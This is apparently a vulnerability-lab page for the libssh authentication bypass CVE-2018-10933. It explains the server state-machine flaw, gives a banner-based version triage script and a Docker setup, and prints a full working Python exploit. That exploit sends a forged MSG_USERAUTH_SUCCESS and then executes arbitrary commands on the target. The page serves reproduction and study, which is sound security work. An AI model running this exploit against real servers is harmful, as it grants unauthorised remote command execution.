
libssh Authentication Bypass Vulnerability (CVE-2018-10933)

Chinese version

libssh is a multiplatform C library implementing the SSHv2 protocol on the client and server side. A logic vulnerability was found in libssh's server-side state machine: an attacker can send the MSG_USERAUTH_SUCCESS message (a message only the server is supposed to send) before authentication has succeeded. The server then treats the session as authenticated, so the attacker bypasses authentication and gains access to the target SSH server.
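For triaging which hosts in an inventory still run an affected libssh build, the following version check is an added example (not part of the vulhub page or of libssh itself). It assumes the server identification string has the shape `SSH-2.0-libssh_0.8.1` or `SSH-2.0-libssh-0.7.5`, and relies on the advisory facts that 0.6 and later are affected and that 0.7.6 and 0.8.4 are the first fixed releases on their branches; the banners below are constructed samples.

```python
import re
from typing import List, Optional, Tuple

# Assumed banner shape: "SSH-2.0-libssh_0.8.1" (0.8 branch) or
# "SSH-2.0-libssh-0.7.5" (older builds); both separators are accepted.
BANNER_RE = re.compile(r"^SSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)")

# First fixed release per affected branch (libssh advisory for CVE-2018-10933).
# The 0.6 branch never received a fix, so every 0.6.x build is affected.
FIXED = {7: (0, 7, 6), 8: (0, 8, 4)}


def parse_libssh_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from a libssh banner, or None if not libssh."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def assess(banner: str) -> str:
    """Classify one banner: not-libssh, unaffected, vulnerable or patched.

    This is a banner heuristic: a distribution may backport the fix without
    bumping the version string, so 'vulnerable' means 'verify this host'.
    """
    version = parse_libssh_version(banner)
    if version is None:
        return "not-libssh"
    major, minor, _patch = version
    if (major, minor) < (0, 6):
        return "unaffected"        # bug was introduced with the 0.6 code base
    if major > 0 or minor > 8:
        return "patched"           # 0.9 and later shipped after the fix
    first_fixed = FIXED.get(minor)  # None for the never-fixed 0.6 branch
    if first_fixed is None or version < first_fixed:
        return "vulnerable"
    return "patched"


def triage(banners: List[str]) -> List[Tuple[str, str]]:
    """Map each collected banner to its verdict, keeping only hosts to act on."""
    return [(b, assess(b)) for b in banners if assess(b) == "vulnerable"]


if __name__ == "__main__":
    # Constructed sample banners, as an inventory tool might have collected them.
    sample = ["SSH-2.0-libssh_0.8.1", "SSH-2.0-libssh-0.7.6",
              "SSH-2.0-OpenSSH_7.4", "SSH-2.0-libssh_0.6.3"]
    for banner, verdict in triage(sample):
        print(f"{banner}: {verdict}")
```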



Start the environment:

```
docker-compose up -d
```

After the environment has started, connect to port `your-ip:2222` (credentials: `myuser:mypassword`); this is a legitimate SSH login:


Referring to the publicly available POC, we can use the following script to prove the vulnerability.

```python
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048

def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        # Complete the key exchange; no credentials are ever supplied.
        transport.start_client()

        # The bug: the vulnerable server accepts a client-sent
        # MSG_USERAUTH_SUCCESS and switches to the authenticated state.
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        # On a patched server this raises SSHException ("not authenticated").
        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output + error).decode()
    except paramiko.SSHException:
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None

if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
```

You can execute arbitrary commands on the target server, as shown below:
